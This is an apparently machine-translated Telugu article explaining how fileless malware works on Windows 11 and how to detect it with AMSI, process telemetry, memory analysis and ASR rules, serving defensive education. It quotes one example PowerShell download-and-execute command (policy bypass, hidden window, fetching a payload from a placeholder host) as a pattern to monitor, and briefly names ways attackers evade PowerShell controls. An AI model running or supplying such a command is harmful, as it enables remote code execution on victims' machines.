Windows 11లో ప్రమాదకరమైన ఫైల్‌లెస్ మాల్వేర్‌ను ఎలా గుర్తించాలి

చివరి నవీకరణ: 23/11/2025

  • ఫైల్‌లెస్ మాల్వేర్ మెమరీలో పనిచేస్తుంది మరియు పవర్‌షెల్ మరియు WMI వంటి చట్టబద్ధమైన ప్రక్రియలను దుర్వినియోగం చేస్తుంది.
  • ప్రభావవంతమైన గుర్తింపుకు ఫైల్‌లను మాత్రమే కాకుండా ప్రవర్తనలను పర్యవేక్షించడం మరియు జ్ఞాపకశక్తిని విశ్లేషించడం అవసరం.
  • AMSI, ప్రాసెస్ టెలిమెట్రీ, ఉపరితల తగ్గింపు నియమాలు మరియు చురుకైన వేట అనేవి Windows 11లో కీలకమైన లక్షణాలు.
  • ఫర్మ్‌వేర్ మరియు USB లతో పాటు WMI, రిజిస్ట్రీ మరియు MBR లలో నిలకడ దాడి ఉపరితలాన్ని విస్తరిస్తుంది.

ప్రమాదకరమైన ఫైల్‌లెస్ మాల్వేర్‌ను ఎలా గుర్తించాలి

¿ప్రమాదకరమైన ఫైల్‌లెస్ మాల్వేర్‌ను ఎలా గుర్తించాలి? ఫైల్‌లెస్ దాడి కార్యకలాపాలు గణనీయంగా పెరిగాయి మరియు విషయాలను మరింత దిగజార్చాయి, విండోస్ 11 కి రక్షణ లేదుఈ విధానం డిస్క్‌ను దాటవేస్తుంది మరియు మెమరీ మరియు చట్టబద్ధమైన సిస్టమ్ సాధనాలపై ఆధారపడుతుంది; అందుకే సంతకం ఆధారిత యాంటీవైరస్ ప్రోగ్రామ్‌లు కష్టపడతాయి. మీరు దానిని గుర్తించడానికి నమ్మదగిన మార్గం కోసం చూస్తున్నట్లయితే, సమాధానం కలపడంలో ఉంటుంది టెలిమెట్రీ, ప్రవర్తన విశ్లేషణ మరియు విండోస్ నియంత్రణలు.

ప్రస్తుత పర్యావరణ వ్యవస్థలో, పవర్‌షెల్, WMI లేదా Mshta లను దుర్వినియోగం చేసే ప్రచారాలు మెమరీ ఇంజెక్షన్లు, డిస్క్‌ను "తాకకుండా" పట్టుదల వంటి మరింత అధునాతన పద్ధతులతో కలిసి ఉంటాయి మరియు ఫర్మ్‌వేర్ దుర్వినియోగాలుRAM లో ప్రతిదీ జరిగినప్పుడు కూడా ముప్పు పటం, దాడి దశలు మరియు అవి ఏ సంకేతాలను వదిలివేస్తాయో అర్థం చేసుకోవడం కీలకం.

ఫైల్‌లెస్ మాల్వేర్ అంటే ఏమిటి మరియు అది Windows 11లో ఎందుకు ఆందోళన కలిగిస్తుంది?

మనం "ఫైల్‌లెస్" బెదిరింపుల గురించి మాట్లాడేటప్పుడు, మనం హానికరమైన కోడ్‌ను సూచిస్తున్నాము, అది మీరు కొత్త ఎక్జిక్యూటబుల్‌లను డిపాజిట్ చేయవలసిన అవసరం లేదు ఫైల్ సిస్టమ్‌లో పనిచేయడానికి. ఇది సాధారణంగా నడుస్తున్న ప్రక్రియలలోకి ఇంజెక్ట్ చేయబడుతుంది మరియు RAMలో అమలు చేయబడుతుంది, Microsoft సంతకం చేసిన ఇంటర్‌ప్రెటర్‌లు మరియు బైనరీలపై ఆధారపడి ఉంటుంది (ఉదా., పవర్‌షెల్, WMI, rundll32, mshtaఇది మీ పాదముద్రను తగ్గిస్తుంది మరియు అనుమానాస్పద ఫైల్‌ల కోసం మాత్రమే చూసే ఇంజిన్‌లను దాటవేయడానికి మిమ్మల్ని అనుమతిస్తుంది.

ఆదేశాలను ప్రారంభించడానికి దుర్బలత్వాలను ఉపయోగించుకునే కార్యాలయ పత్రాలు లేదా PDFలు కూడా ఈ దృగ్విషయంలో భాగంగా పరిగణించబడతాయి, ఎందుకంటే మెమరీలో అమలును సక్రియం చేయండి విశ్లేషణ కోసం ఉపయోగకరమైన బైనరీలను వదిలివేయకుండా. దుర్వినియోగం మాక్రోలు మరియు DDE ఆఫీసులో, కోడ్ WinWord వంటి చట్టబద్ధమైన ప్రక్రియలలో నడుస్తుంది కాబట్టి.

దాడి చేసేవారు సోషల్ ఇంజనీరింగ్ (ఫిషింగ్, స్పామ్ లింక్‌లు)ను సాంకేతిక ఉచ్చులతో కలుపుతారు: వినియోగదారు క్లిక్ ఒక గొలుసును ప్రారంభిస్తుంది, దీనిలో స్క్రిప్ట్ మెమరీలో తుది పేలోడ్‌ను డౌన్‌లోడ్ చేసి అమలు చేస్తుంది, ఒక జాడను వదలకుండా ఉండటం డిస్క్‌లో. లక్ష్యాలు డేటా దొంగతనం నుండి రాన్సమ్‌వేర్ అమలు వరకు, నిశ్శబ్ద పార్శ్వ కదలిక వరకు ఉంటాయి.

ఫైల్‌లెస్ మాల్వేర్ గుర్తింపు

వ్యవస్థలో పాదముద్ర ద్వారా టైపోలాజీలు: 'స్వచ్ఛమైన' నుండి సంకరజాతుల వరకు

గందరగోళ భావనలను నివారించడానికి, ఫైల్ సిస్టమ్‌తో వాటి పరస్పర చర్య స్థాయి ద్వారా ముప్పులను వేరు చేయడం సహాయపడుతుంది. ఈ వర్గీకరణ స్పష్టం చేస్తుంది ఏమి కొనసాగుతుంది, కోడ్ ఎక్కడ నివసిస్తుంది మరియు అది ఏ సంకేతాలను వదిలివేస్తుంది?.

రకం I: ఫైల్ కార్యాచరణ లేదు

పూర్తిగా ఫైల్‌లెస్ మాల్వేర్ డిస్క్‌కు ఏమీ రాయదు. ఒక క్లాసిక్ ఉదాహరణ దోపిడీ చేయడం a నెట్‌వర్క్ దుర్బలత్వం (ఆనాటి ఎటర్నల్ బ్లూ వెక్టర్ లాగా) కెర్నల్ మెమరీలో ఉండే బ్యాక్‌డోర్‌ను అమలు చేయడానికి (డబుల్ పల్సర్ వంటివి). ఇక్కడ, ప్రతిదీ RAMలో జరుగుతుంది మరియు ఫైల్ సిస్టమ్‌లో ఎటువంటి కళాఖండాలు లేవు.

మరొక ఎంపిక ఏమిటంటే, ఫర్మ్వేర్ భాగాల సంఖ్య: BIOS/UEFI, నెట్‌వర్క్ అడాప్టర్లు, USB పెరిఫెరల్స్ (BadUSB-రకం పద్ధతులు) లేదా CPU ఉపవ్యవస్థలు. అవి పునఃప్రారంభాలు మరియు పునఃస్థాపనల ద్వారా కొనసాగుతాయి, అదనపు కష్టంతో కొన్ని ఉత్పత్తులు ఫర్మ్‌వేర్‌ను తనిఖీ చేస్తాయిఇవి సంక్లిష్టమైన దాడులు, తక్కువ తరచుగా జరుగుతాయి, కానీ వాటి రహస్యత మరియు మన్నిక కారణంగా ప్రమాదకరమైనవి.

రకం II: పరోక్ష ఆర్కైవింగ్ కార్యాచరణ

ఇక్కడ, మాల్వేర్ దాని స్వంత ఎక్జిక్యూటబుల్‌ను "వదిలివేయదు", కానీ తప్పనిసరిగా ఫైల్‌లుగా నిల్వ చేయబడిన సిస్టమ్-నిర్వహించబడిన కంటైనర్‌లను ఉపయోగిస్తుంది. ఉదాహరణకు, ప్లాంట్ చేసే బ్యాక్‌డోర్లు పవర్‌షెల్ ఆదేశాలు WMI రిపోజిటరీలో మరియు ఈవెంట్ ఫిల్టర్‌లతో దాని అమలును ట్రిగ్గర్ చేస్తుంది. బైనరీలను వదలకుండా కమాండ్ లైన్ నుండి దీన్ని ఇన్‌స్టాల్ చేయడం సాధ్యమే, కానీ WMI రిపోజిటరీ డిస్క్‌లో చట్టబద్ధమైన డేటాబేస్‌గా ఉంటుంది, దీని వలన సిస్టమ్‌ను ప్రభావితం చేయకుండా శుభ్రం చేయడం కష్టమవుతుంది.

ఆచరణాత్మక దృక్కోణం నుండి అవి ఫైల్‌లెస్‌గా పరిగణించబడతాయి, ఎందుకంటే ఆ కంటైనర్ (WMI, రిజిస్ట్రీ, మొదలైనవి) ఇది క్లాసిక్ డిటెక్టబుల్ ఎక్జిక్యూటబుల్ కాదు. మరియు దాని శుభ్రపరచడం అల్పమైనది కాదు. ఫలితం: తక్కువ "సాంప్రదాయ" జాడతో రహస్య పట్టుదల.

ప్రత్యేక కంటెంట్ - ఇక్కడ క్లిక్ చేయండి  కీ లేకుండా లాక్ ఎలా తెరవాలి

రకం III: పనిచేయడానికి ఫైల్‌లు అవసరం

కొన్ని కేసులు 'ఫైల్‌లెస్' పట్టుదల తార్కిక స్థాయిలో, వారికి ఫైల్-ఆధారిత ట్రిగ్గర్ అవసరం. దీనికి సాధారణ ఉదాహరణ కోవ్టర్: ఇది యాదృచ్ఛిక పొడిగింపు కోసం షెల్ క్రియను నమోదు చేస్తుంది; ఆ పొడిగింపుతో ఉన్న ఫైల్ తెరిచినప్పుడు, mshta.exe ఉపయోగించి ఒక చిన్న స్క్రిప్ట్ ప్రారంభించబడుతుంది, ఇది రిజిస్ట్రీ నుండి హానికరమైన స్ట్రింగ్‌ను పునర్నిర్మిస్తుంది.

ట్రిక్ ఏమిటంటే, యాదృచ్ఛిక పొడిగింపులతో కూడిన ఈ "బైట్" ఫైల్‌లు విశ్లేషించదగిన పేలోడ్‌ను కలిగి ఉండవు మరియు కోడ్‌లో ఎక్కువ భాగం నమోదు (మరొక కంటైనర్). అందుకే వాటిని ప్రభావంలో ఫైల్‌లెస్‌గా వర్గీకరించారు, ఖచ్చితంగా చెప్పాలంటే అవి ఒకటి లేదా అంతకంటే ఎక్కువ డిస్క్ కళాఖండాలపై ట్రిగ్గర్‌గా ఆధారపడి ఉంటాయి.

ఇన్ఫెక్షన్ యొక్క వెక్టర్స్ మరియు 'హోస్ట్స్': అది ఎక్కడ ప్రవేశిస్తుంది మరియు ఎక్కడ దాక్కుంటుంది

గుర్తింపును మెరుగుపరచడానికి, సంక్రమణ ప్రవేశ స్థానం మరియు హోస్ట్‌ను మ్యాప్ చేయడం చాలా ముఖ్యం. ఈ దృక్పథం రూపొందించడానికి సహాయపడుతుంది నిర్దిష్ట నియంత్రణలు తగిన టెలిమెట్రీకి ప్రాధాన్యత ఇవ్వండి.

దోపిడీలు

  • ఫైల్ ఆధారిత (రకం III): డాక్యుమెంట్లు, ఎక్జిక్యూటబుల్స్, లెగసీ ఫ్లాష్/జావా ఫైల్స్ లేదా LNK ఫైల్స్ షెల్‌కోడ్‌ను మెమరీలోకి లోడ్ చేయడానికి బ్రౌజర్ లేదా వాటిని ప్రాసెస్ చేసే ఇంజిన్‌ను ఉపయోగించుకోవచ్చు. మొదటి వెక్టర్ ఒక ఫైల్, కానీ పేలోడ్ RAMకి ప్రయాణిస్తుంది.
  • నెట్‌వర్క్ ఆధారితం (టైప్ I): దుర్బలత్వాన్ని ఉపయోగించుకునే ప్యాకేజీ (ఉదా., SMBలో) యూజర్‌ల్యాండ్ లేదా కెర్నల్‌లో అమలును సాధిస్తుంది. WannaCry ఈ విధానాన్ని ప్రాచుర్యంలోకి తెచ్చింది. డైరెక్ట్ మెమరీ లోడ్ కొత్త ఫైల్ లేకుండా.

హార్డ్వేర్

  • పరికరాల (రకం I): డిస్క్ లేదా నెట్‌వర్క్ కార్డ్ ఫర్మ్‌వేర్‌ను మార్చవచ్చు మరియు కోడ్‌ను ప్రవేశపెట్టవచ్చు. తనిఖీ చేయడం కష్టం మరియు OS వెలుపల కొనసాగుతుంది.
  • CPU మరియు నిర్వహణ ఉపవ్యవస్థలు (రకం I): ఇంటెల్ యొక్క ME/AMT వంటి సాంకేతికతలు దీనికి మార్గాలను ప్రదర్శించాయి OS వెలుపల నెట్‌వర్కింగ్ మరియు అమలుఇది చాలా తక్కువ స్థాయిలో దాడి చేస్తుంది, స్టెల్త్ సామర్థ్యం ఎక్కువగా ఉంటుంది.
  • USB (రకం I): BadUSB మీరు కీబోర్డ్ లేదా NIC వలె నటించడానికి మరియు ఆదేశాలను ప్రారంభించడానికి లేదా ట్రాఫిక్‌ను దారి మళ్లించడానికి USB డ్రైవ్‌ను రీప్రోగ్రామ్ చేయడానికి అనుమతిస్తుంది.
  • BIOS / UEFI (టైప్ I): విండోస్ బూట్ అయ్యే ముందు నడిచే హానికరమైన ఫర్మ్‌వేర్ రీప్రోగ్రామింగ్ (మెబ్రోమి లాంటి సందర్భాలు).
  • హైపర్వైజర్ (రకం I): దాని ఉనికిని దాచడానికి OS కింద ఒక మినీ-హైపర్‌వైజర్‌ను అమలు చేయడం. అరుదైనది, కానీ ఇప్పటికే హైపర్‌వైజర్ రూట్‌కిట్‌ల రూపంలో గమనించబడింది.

అమలు మరియు ఇంజెక్షన్

  • ఫైల్ ఆధారిత (రకం III): EXE/DLL/LNK లేదా చట్టబద్ధమైన ప్రక్రియలలోకి ఇంజెక్షన్లను ప్రారంభించే షెడ్యూల్డ్ పనులు.
  • macros (రకం III): ఆఫీస్‌లోని VBA, మోసం ద్వారా వినియోగదారు సమ్మతితో పూర్తి రాన్సమ్‌వేర్‌తో సహా పేలోడ్‌లను డీకోడ్ చేసి అమలు చేయగలదు.
  • స్క్రిప్ట్లు (టైప్ II): పవర్‌షెల్, VBScript లేదా JScript ఫైల్, కమాండ్ లైన్ నుండి, సేవలు, రిజిస్ట్రేషన్ లేదా WMIదాడి చేసే వ్యక్తి డిస్క్‌ను తాకకుండానే రిమోట్ సెషన్‌లో స్క్రిప్ట్‌ను టైప్ చేయవచ్చు.
  • బూట్ రికార్డ్ (MBR/బూట్) (రకం II): పెట్యా వంటి కుటుంబాలు ప్రారంభంలో నియంత్రణ తీసుకోవడానికి బూట్ సెక్టార్‌ను ఓవర్‌రైట్ చేస్తాయి. ఇది ఫైల్ సిస్టమ్ వెలుపల ఉంది, కానీ OS మరియు దానిని పునరుద్ధరించగల ఆధునిక పరిష్కారాలకు అందుబాటులో ఉంటుంది.

ఫైల్‌లెస్ దాడులు ఎలా పనిచేస్తాయి: దశలు మరియు సంకేతాలు

అవి ఎగ్జిక్యూటబుల్ ఫైల్‌లను వదిలిపెట్టనప్పటికీ, ప్రచారాలు దశలవారీ తర్కాన్ని అనుసరిస్తాయి. వాటిని అర్థం చేసుకోవడం పర్యవేక్షణను అనుమతిస్తుంది. సంఘటనలు మరియు ప్రక్రియల మధ్య సంబంధాలు అవి ఒక గుర్తును వదిలివేస్తాయి.

  • ప్రారంభ యాక్సెస్లింక్‌లు లేదా అటాచ్‌మెంట్‌లు, రాజీపడిన వెబ్‌సైట్‌లు లేదా దొంగిలించబడిన ఆధారాలను ఉపయోగించి ఫిషింగ్ దాడులు జరుగుతాయి. చాలా గొలుసులు ఆదేశాన్ని ట్రిగ్గర్ చేసే ఆఫీస్ డాక్యుమెంట్‌తో ప్రారంభమవుతాయి. PowerShell.
  • పట్టుదల: WMI ద్వారా బ్యాక్‌డోర్లు (ఫిల్టర్‌లు మరియు సబ్‌స్క్రిప్షన్‌లు), రిజిస్ట్రీ అమలు కీలు లేదా కొత్త హానికరమైన ఫైల్ లేకుండా స్క్రిప్ట్‌లను తిరిగి ప్రారంభించే షెడ్యూల్ చేసిన పనులు.
  • నిర్మూలనసమాచారం సేకరించిన తర్వాత, ట్రాఫిక్‌ను కలపడానికి విశ్వసనీయ ప్రక్రియలను (బ్రౌజర్‌లు, పవర్‌షెల్, బిట్‌అడ్మిన్) ఉపయోగించి నెట్‌వర్క్ నుండి బయటకు పంపబడుతుంది.

ఈ నమూనా ముఖ్యంగా కృత్రిమమైనది ఎందుకంటే దాడి సూచికలు అవి సాధారణ స్థితిలో దాక్కుంటాయి: కమాండ్-లైన్ ఆర్గ్యుమెంట్‌లు, ప్రాసెస్ చైనింగ్, క్రమరహిత అవుట్‌బౌండ్ కనెక్షన్‌లు లేదా ఇంజెక్షన్ APIలకు యాక్సెస్.

సాధారణ పద్ధతులు: మెమరీ నుండి రికార్డింగ్ వరకు

నటులు వివిధ రకాలపై ఆధారపడతారు పద్ధతులు స్టెల్త్‌ను ఆప్టిమైజ్ చేస్తుంది. ప్రభావవంతమైన గుర్తింపును సక్రియం చేయడానికి అత్యంత సాధారణమైన వాటిని తెలుసుకోవడం సహాయపడుతుంది.

  • జ్ఞాపకాలలో నివాసి: యాక్టివేషన్ కోసం వేచి ఉన్న విశ్వసనీయ ప్రక్రియ యొక్క స్థలంలోకి పేలోడ్‌లను లోడ్ చేస్తోంది. రూట్‌కిట్‌లు మరియు హుక్స్ కెర్నల్‌లో, అవి దాచే స్థాయిని పెంచుతాయి.
  • రిజిస్ట్రీలో పట్టుదలఎన్‌క్రిప్ట్ చేసిన బ్లాబ్‌లను కీలలో సేవ్ చేసి, వాటిని చట్టబద్ధమైన లాంచర్ (mshta, rundll32, wscript) నుండి రీహైడ్రేట్ చేయండి. ఎఫెమెరల్ ఇన్‌స్టాలర్ దాని పాదముద్రను తగ్గించడానికి స్వీయ-నాశనం చేయగలదు.
  • ఆధారాల ఫిషింగ్దొంగిలించబడిన వినియోగదారు పేర్లు మరియు పాస్‌వర్డ్‌లను ఉపయోగించి, దాడి చేసేవాడు రిమోట్ షెల్‌లు మరియు ప్లాంట్‌లను అమలు చేస్తాడు. నిశ్శబ్ద యాక్సెస్ రిజిస్ట్రీ లేదా WMI లో.
  • 'ఫైల్‌లెస్' రాన్సమ్‌వేర్ఎన్‌క్రిప్షన్ మరియు C2 కమ్యూనికేషన్ RAM నుండి ఆర్కెస్ట్రేట్ చేయబడతాయి, నష్టం కనిపించే వరకు గుర్తించే అవకాశాలను తగ్గిస్తాయి.
  • ఆపరేటింగ్ కిట్‌లు: వినియోగదారు క్లిక్ చేసిన తర్వాత దుర్బలత్వాలను గుర్తించి మెమరీ-మాత్రమే పేలోడ్‌లను అమలు చేసే ఆటోమేటెడ్ చైన్‌లు.
  • కోడ్ ఉన్న పత్రాలు: డిస్క్‌లో ఎక్జిక్యూటబుల్‌లను సేవ్ చేయకుండా ఆదేశాలను ట్రిగ్గర్ చేసే DDE వంటి మాక్రోలు మరియు మెకానిజమ్‌లు.
ప్రత్యేక కంటెంట్ - ఇక్కడ క్లిక్ చేయండి  Intego Mac ఇంటర్నెట్ సెక్యూరిటీతో మాల్వేర్ తొలగింపును నేను ఎలా కాన్ఫిగర్ చేయాలి?

పరిశ్రమ అధ్యయనాలు ఇప్పటికే గుర్తించదగిన శిఖరాలను చూపించాయి: 2018లో ఒక కాలంలో, a 90% పైగా పెరుగుదల స్క్రిప్ట్-ఆధారిత మరియు పవర్‌షెల్ చైన్ దాడులలో, వెక్టర్ దాని ప్రభావానికి ప్రాధాన్యతనిస్తుందని సంకేతం.

కంపెనీలు మరియు సరఫరాదారులకు సవాలు: నిరోధించడం ఎందుకు సరిపోదు

పవర్‌షెల్‌ను నిలిపివేయడం లేదా మాక్రోలను శాశ్వతంగా నిషేధించడం ఉత్సాహం కలిగిస్తుంది, కానీ నువ్వు ఆపరేషన్ ని బ్రేక్ చేస్తావు.పవర్‌షెల్ ఆధునిక పరిపాలనకు మూలస్తంభం మరియు వ్యాపారంలో ఆఫీస్ చాలా అవసరం; గుడ్డిగా నిరోధించడం తరచుగా సాధ్యం కాదు.

ఇంకా, ప్రాథమిక నియంత్రణలను దాటవేయడానికి మార్గాలు ఉన్నాయి: DLLలు మరియు rundll32ల ద్వారా PowerShellను అమలు చేయడం, EXEలలోకి స్క్రిప్ట్‌లను ప్యాకేజింగ్ చేయడం, మీ స్వంత పవర్‌షెల్ కాపీని తీసుకురండి. లేదా చిత్రాలలో స్క్రిప్ట్‌లను దాచిపెట్టి వాటిని మెమరీలోకి సంగ్రహించవచ్చు. కాబట్టి, రక్షణ అనేది సాధనాల ఉనికిని తిరస్కరించడంపై మాత్రమే ఆధారపడి ఉండకూడదు.

మరో సాధారణ తప్పు ఏమిటంటే మొత్తం నిర్ణయాన్ని క్లౌడ్‌కు అప్పగించడం: ఏజెంట్ సర్వర్ నుండి ప్రతిస్పందన కోసం వేచి ఉండాల్సి వస్తే, మీరు నిజ-సమయ నివారణను కోల్పోతారుసమాచారాన్ని మెరుగుపరచడానికి టెలిమెట్రీ డేటాను అప్‌లోడ్ చేయవచ్చు, కానీ ఉపశమనం ముగింపు బిందువు వద్ద జరగాలి..

Windows 11లో ఫైల్‌లెస్ మాల్వేర్‌ను ఎలా గుర్తించాలి: టెలిమెట్రీ మరియు ప్రవర్తన

గెలుపు వ్యూహం ఏమిటంటే ప్రక్రియలు మరియు జ్ఞాపకశక్తిని పర్యవేక్షించడంఫైల్స్ కాదు. ఒక ఫైల్ తీసుకునే రూపాల కంటే హానికరమైన ప్రవర్తనలు మరింత స్థిరంగా ఉంటాయి, ఇవి నివారణ ఇంజిన్లకు అనువైనవిగా చేస్తాయి.

  • AMSI (యాంటీమాల్వేర్ స్కాన్ ఇంటర్ఫేస్)ఇది పవర్‌షెల్, VBScript లేదా JScript స్క్రిప్ట్‌లను మెమరీలో డైనమిక్‌గా నిర్మించినప్పటికీ అడ్డగిస్తుంది. అమలుకు ముందు అస్పష్టమైన స్ట్రింగ్‌లను సంగ్రహించడానికి అద్భుతమైనది.
  • ప్రక్రియ పర్యవేక్షణ: ప్రారంభం/ముగింపు, PID, తల్లిదండ్రులు మరియు పిల్లలు, మార్గాలు, కమాండ్ లైన్లు పూర్తి కథను అర్థం చేసుకోవడానికి హ్యాష్‌లు, ప్లస్ ఎగ్జిక్యూషన్ ట్రీలు.
  • మెమరీ విశ్లేషణ: డిస్క్‌ను తాకకుండా ఇంజెక్షన్లు, ప్రతిబింబించే లేదా PE లోడ్‌లను గుర్తించడం మరియు అసాధారణ అమలు చేయగల ప్రాంతాల సమీక్ష.
  • స్టార్టర్ సెక్టార్ రక్షణ: ట్యాంపరింగ్ జరిగితే MBR/EFI నియంత్రణ మరియు పునరుద్ధరణ.

మైక్రోసాఫ్ట్ పర్యావరణ వ్యవస్థలో, డిఫెండర్ ఫర్ ఎండ్‌పాయింట్ AMSI ని మిళితం చేస్తుంది, ప్రవర్తన పర్యవేక్షణమెమరీ స్కానింగ్ మరియు క్లౌడ్-ఆధారిత మెషిన్ లెర్నింగ్‌లను కొత్త లేదా అస్పష్టమైన వేరియంట్‌లకు వ్యతిరేకంగా డిటెక్షన్‌లను స్కేల్ చేయడానికి ఉపయోగిస్తారు. ఇతర విక్రేతలు కెర్నల్-రెసిడెంట్ ఇంజిన్‌లతో ఇలాంటి విధానాలను ఉపయోగిస్తారు.

సహసంబంధం యొక్క వాస్తవిక ఉదాహరణ: డాక్యుమెంట్ నుండి పవర్‌షెల్ వరకు

ఔట్లుక్ ఒక అటాచ్‌మెంట్‌ను డౌన్‌లోడ్ చేసుకునే, వర్డ్ డాక్యుమెంట్‌ను తెరిచే, యాక్టివ్ కంటెంట్ ఎనేబుల్ అయ్యే, మరియు అనుమానాస్పద పారామితులతో పవర్‌షెల్ ప్రారంభించబడే గొలుసును ఊహించుకోండి. సరైన టెలిమెట్రీ కమాండ్ లైన్ (ఉదా., ఎగ్జిక్యూషన్ పాలసీ బైపాస్, దాచిన విండో), విశ్వసనీయత లేని డొమైన్‌కు కనెక్ట్ చేయడం మరియు AppDataలో తనను తాను ఇన్‌స్టాల్ చేసుకునే చైల్డ్ ప్రాసెస్‌ను సృష్టించడం.

స్థానిక సందర్భం ఉన్న ఏజెంట్ సామర్థ్యం కలిగి ఉంటాడు ఆపి వెనక్కి తిప్పండి SIEMకి తెలియజేయడంతో పాటు లేదా ఇమెయిల్/SMS ద్వారా మాన్యువల్ జోక్యం లేకుండా హానికరమైన కార్యాచరణ. కొన్ని ఉత్పత్తులు రూట్ కాజ్ అట్రిబ్యూషన్ లేయర్ (స్టోరీలైన్-టైప్ మోడల్స్)ను జోడిస్తాయి, ఇది కనిపించే ప్రక్రియను (ఔట్‌లుక్/వర్డ్) కాకుండా, పూర్తి హానికరమైన థ్రెడ్ మరియు వ్యవస్థను సమగ్రంగా శుభ్రపరచడానికి దాని మూలం.

గమనించవలసిన సాధారణ కమాండ్ నమూనా ఇలా ఉండవచ్చు: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');లాజిక్ అనేది ఖచ్చితమైన స్ట్రింగ్ కాదు, కానీ సంకేతాల సమితి: పాలసీ బైపాస్, దాచిన విండో, క్లియర్ డౌన్‌లోడ్ మరియు ఇన్-మెమరీ ఎగ్జిక్యూషన్.

AMSI, పైప్‌లైన్ మరియు ప్రతి నటుడి పాత్ర: ఎండ్ పాయింట్ నుండి SOC వరకు

స్క్రిప్ట్ క్యాప్చర్‌కు మించి, ఒక బలమైన ఆర్కిటెక్చర్ దర్యాప్తు మరియు ప్రతిస్పందనను సులభతరం చేసే దశలను నిర్దేశిస్తుంది. లోడ్ అమలు చేయడానికి ముందు ఎంత ఎక్కువ ఆధారాలు ఉంటే అంత మంచిది., ఉత్తమమైనది.

  • స్క్రిప్ట్ ఇంటర్‌సెప్షన్మాల్వేర్ పైప్‌లైన్‌లో స్టాటిక్ మరియు డైనమిక్ విశ్లేషణ కోసం AMSI కంటెంట్‌ను (అది అకస్మాత్తుగా ఉత్పత్తి చేయబడినప్పటికీ) అందిస్తుంది.
  • ప్రాసెస్ ఈవెంట్‌లుPIDలు, బైనరీలు, హ్యాష్‌లు, రూట్‌లు మరియు ఇతర డేటా సేకరించబడతాయి. వాదనలు, తుది లోడ్‌కు దారితీసిన ప్రాసెస్ ట్రీలను ఏర్పాటు చేయడం.
  • గుర్తింపు మరియు నివేదికఈ గుర్తింపులు ఉత్పత్తి కన్సోల్‌లో ప్రదర్శించబడతాయి మరియు ప్రచార విజువలైజేషన్ కోసం నెట్‌వర్క్ ప్లాట్‌ఫారమ్‌లకు (NDR) ఫార్వార్డ్ చేయబడతాయి.
  • వినియోగదారు హామీలుఒక స్క్రిప్ట్‌ను మెమరీలోకి ఇంజెక్ట్ చేసినప్పటికీ, ఫ్రేమ్‌వర్క్ AMSI దానిని అడ్డగించింది Windows యొక్క అనుకూల వెర్షన్లలో.
  • నిర్వాహక సామర్థ్యాలు: స్క్రిప్ట్ తనిఖీని ప్రారంభించడానికి విధాన ఆకృతీకరణ, ప్రవర్తన ఆధారిత బ్లాకింగ్ మరియు కన్సోల్ నుండి నివేదికలను సృష్టించడం.
  • SOC పని: చరిత్రను పునఃసృష్టించడానికి కళాఖండాల వెలికితీత (VM UUID, OS వెర్షన్, స్క్రిప్ట్ రకం, ఇనిషియేటర్ ప్రాసెస్ మరియు దాని పేరెంట్, హ్యాష్‌లు మరియు కమాండ్ లైన్‌లు) మరియు లిఫ్ట్ నియమాలు భవిష్యత్తు.
ప్రత్యేక కంటెంట్ - ఇక్కడ క్లిక్ చేయండి  Microsoft Edgeలో భద్రత మరియు గోప్యత

ప్లాట్‌ఫామ్ ఎగుమతి చేయడానికి అనుమతించినప్పుడు మెమరీ బఫర్ అమలుతో అనుబంధించబడి, పరిశోధకులు కొత్త గుర్తింపులను రూపొందించగలరు మరియు సారూప్య వైవిధ్యాలకు వ్యతిరేకంగా రక్షణను మెరుగుపరచగలరు.

Windows 11లో ఆచరణాత్మక చర్యలు: నివారణ మరియు వేట

2025 లో విండోస్ 11 ని సరిగ్గా ఇన్‌స్టాల్ చేయండి

మెమరీ తనిఖీ మరియు AMSIతో EDRని కలిగి ఉండటంతో పాటు, Windows 11 మిమ్మల్ని దాడి స్థలాలను మూసివేసి, దృశ్యమానతను మెరుగుపరచడానికి అనుమతిస్తుంది స్థానిక నియంత్రణలు.

  • పవర్‌షెల్‌లో నమోదు మరియు పరిమితులుస్క్రిప్ట్ బ్లాక్ లాగింగ్ మరియు మాడ్యూల్ లాగింగ్‌ను ప్రారంభిస్తుంది, సాధ్యమైన చోట పరిమితం చేయబడిన మోడ్‌లను వర్తింపజేస్తుంది మరియు వినియోగాన్ని నియంత్రిస్తుంది బైపాస్/దాచబడింది.
  • దాడి ఉపరితల తగ్గింపు (ASR) నియమాలు: ఆఫీస్ ప్రాసెస్‌ల ద్వారా స్క్రిప్ట్ లాంచ్‌లను బ్లాక్ చేస్తుంది మరియు WMI దుర్వినియోగం/PSExec అవసరం లేనప్పుడు.
  • ఆఫీస్ మాక్రో విధానాలు: డిఫాల్ట్‌గా అంతర్గత మాక్రో సైనింగ్ మరియు కఠినమైన ట్రస్ట్ జాబితాలను నిలిపివేస్తుంది; లెగసీ DDE ప్రవాహాలను పర్యవేక్షిస్తుంది.
  • WMI ఆడిట్ మరియు రిజిస్ట్రీ: ఈవెంట్ సబ్‌స్క్రిప్షన్‌లు మరియు ఆటోమేటిక్ ఎగ్జిక్యూషన్ కీలను (రన్, రన్ఒన్స్, విన్‌లాగన్) అలాగే టాస్క్ సృష్టిని పర్యవేక్షిస్తుంది. షెడ్యూల్ చేయబడింది.
  • స్టార్టప్ రక్షణ: సెక్యూర్ బూట్‌ను యాక్టివేట్ చేస్తుంది, MBR/EFI సమగ్రతను తనిఖీ చేస్తుంది మరియు ప్రారంభంలో ఎటువంటి మార్పులు లేవని ధృవీకరిస్తుంది.
  • ప్యాచింగ్ మరియు గట్టిపడటం: బ్రౌజర్‌లు, ఆఫీస్ భాగాలు మరియు నెట్‌వర్క్ సేవలలో దోపిడీకి గురయ్యే దుర్బలత్వాలను మూసివేస్తుంది.
  • అవగాహన: ఫిషింగ్ మరియు సిగ్నల్‌లలో వినియోగదారులకు మరియు సాంకేతిక బృందాలకు శిక్షణ ఇస్తుంది రహస్య మరణశిక్షలు.

